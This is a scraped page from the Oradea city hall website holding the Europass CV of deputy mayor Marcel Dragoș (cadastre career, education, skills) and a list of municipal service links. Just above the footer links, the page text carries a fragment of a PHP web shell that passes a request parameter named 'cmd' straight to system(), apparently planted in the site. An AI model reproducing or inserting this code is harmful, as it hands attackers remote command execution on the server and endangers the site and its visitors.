Trimite unui prieten

Marcel Dragoş

Marti , 20 Octombrie 2020, 12:46

Exportă PDF - Marcel Dragoş Tipărește pagina - Marcel Dragoş Trimite unui prieten - Marcel Dragoş
Marcel Dragoş

Europass

CurriculumVitae

 

 

 

Informații personale

 

Prenume / Nume

DRAGOȘ MARCEL DANIEL

Adresa

Oradea

Mobil

 

 

E-mail

marcel.dragos@oradea.ro

Nationalitate

ROMANA

Ziua nasterii

15/081972

Sex

Masculin

 

 

Experiență profesională

 

Perioada

19/10/2020 -prezent

Funcția sau postul ocupat

Viceprimar al Municipiului Oradea

Activități și responsabilități principale

   Coordonarea activității următoarelor compartimente funcționale și servicii publice de

   interes local Direcția Economică, Direcția Tehnică, S.C. Termoficare Oradea S.A. și

   Compania de Apă Oradea S.A.

 

Numele și adresa angajatorului

Primăria Municipiului Oradea

 

Tipul activității sau sectorul de activitatea

 

Administrație.

Perioada

 

Funcția sau postul ocupat

  08.10.2012 - 19.10.2020     sef serviciu cadastru la OCPI Bihor

 

Activități și responsabilități principale

  05.08.2010 - 08.10.2012    director cu delegatie prin detaşare la OCPI Bihor

 

Numele și adresa angajatorului

05.10.2009 - 05.08.2010    inginer sef cu delegatie prin detaşare si cu atributiile functiei de

                                            director la OCPI  Bihor

 

06.07.2009 - 05.10.2009    inginer sef cu delegatie prin detaşare la OCPI Bihor

 

02.07.2009 - 06.07.2009    consilier grad I A Serviciul Cadastru prin detaşare la OCPI      

                                            Bihor

 

19.06.2009 - 02.07.2009    sef formatie topo la ANIF RA SUCURSALA TERITORIALĂ

                                           SOMEŞ CRIS

 

01.07.2007 - 01.02.2009   director executiv adjunct la Administratia Imobiliara Oradea

                                           din cadrul Primăriei Municipiului Oradea

 

 15.11.2001 - 01.07.2007    sef serviciu cadastru la Primaria Municipiului Oradea

 

 04.01.2000 - 15.11.2001    inspector de specialitate in cadrul Biroului Agricol din Primaria  

                                           Municipiului Oradea

 

16.09.1991 - 04.01.2000   tehnician cadastru in cadrul O.C.O.T. Oradea

 

 

Educație și formare

 

                                                Perioada                   

               Calificarea/diploma obținută

                Numele si tipul institutiei de invatamant / furnizorului de formare

Calificarea/diploma obținută

Numele si tipul institutiei de invatamant / furnizorului de formare

 

Diploma de master           Universitatea de vest Vasile Goldis din Arad,specializarea   

                                           Drept administrativ  si Statutul Functionarului Public, promotia

                                           2005, durata 2 semestre

 

 Diploma de licenta           Universitatea din Oradea, Facultatea de Protectia Mediului,

                                            Profilul  Geodezie, Specializarea Cadastru, sesiunea iunie

                                            1999

Competențe și abilități personale

 

 

Limba materna)

 ROMÂNĂ

 

Alte limbi

 

 

Autoevaluare

 

Înţelegere

Vorbire

Scriere

Nivel european (*)

 

Ascultare

Citire

Participare la conversaţie

Discurs oral

Exprimare scrisă

Engleză

 

 

 

 

 

Mediu

 

Mediu

 

Mediu

 

Mediu

 

Mediu

Maghiară

 

 

Mediu

 

Mediu

 

Mediu

 

Mediu

 

Mediu

 

Competente şi abilitati sociale

 

- Spirit de echipă;

- Bun comunicator;

- Seriozitate;

- Capacitate de adaptare;

- Capacitate de asimilare a cunoștiințelor noi;

- Disponibilitate și implicare.

  competențe dobândite în cadrul evenimentelor sociale și culturale la care am participat la    

  nivel local și național.

 

Competente si aptitudini organizatorice

 

  -  Implicare pentru atingerea obiectivelor institutionale fixate

  - Capacitatea de a lucra în condiții de stres

  - Capacității decizionale;

- Relationare adecvata cu membrii grupului

- Spirit organizatoric;

- Aptitudini de coordonare;

- Tenacitate si perseverenta

- Abilității de leadership;

- Spirit analitic;

- Lucru în echipă;

- Monitorizarea lucrului efectuat de echipe

 

 

 

 

 

 

 

CC

 

 

           Competențe și aptitudini digitale

- Utilizator avansat al Microsoft OfficeTM (WordTM, ExcelTM and PowerPointTM);

- Utilizator  al ArcGisTM tools;

- Utilizator avansat al AutocadTM tools;

- Bun cunoscător al MapsysTM tools;

- Permis ECDL

 

 

Certificate/autorizații

- Certificat de autorizare ANCPI - categoria D Seria RO-B-F Nr. 1593/30.05.2013din anul    

  2013;

- Sapienza University of Rome, program the Enterprise Financung in Europe, 21-23 mai 2007

 

Hobby-uri

- Citit;

- Călătorii

 

 

 

 

 

 

 

               

 

"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>

Oradea colecteaza selectiv
Serviciul 112
Situatii de urgenţă
Digital Oradea
Regulament APTOR
Consultare plan de actiune
Consultare strategie integrata
Consultare plan mobilitate
Bugetare participativa
Reabilitarea sistemului de termoficare
Chestionar CityWalk
Harta Oradiei
PUG
Consultare PRU Nufărul 1
Harta intravilan
Registrul local al spaţiilor verzi din municipiul Oradea
Inchiriere locuinta
Ghid colectare deseuri
Oradea City Report
Piste de biciclete
MobilePay
Trafic greu
TPark
T-park SMS
AmParcat
Reabilitarea fatadelor cladirilor din centrul istoric
Fonduri Europene
ZMO
Program colectare selectiva - saci galbeni
Nufarul1
Guvernare transparenta
Reducerea birocratiei
Valorificarea energiei geotermale
POCA2
Revitalizarea urbana la nivelul Municipiului Oradea
Reabilitarea, restaurarea si refunctionalizarea zidurilor Cetatii Oradea
Gimnaziala 11
ROHU 421
Proiect Ambulator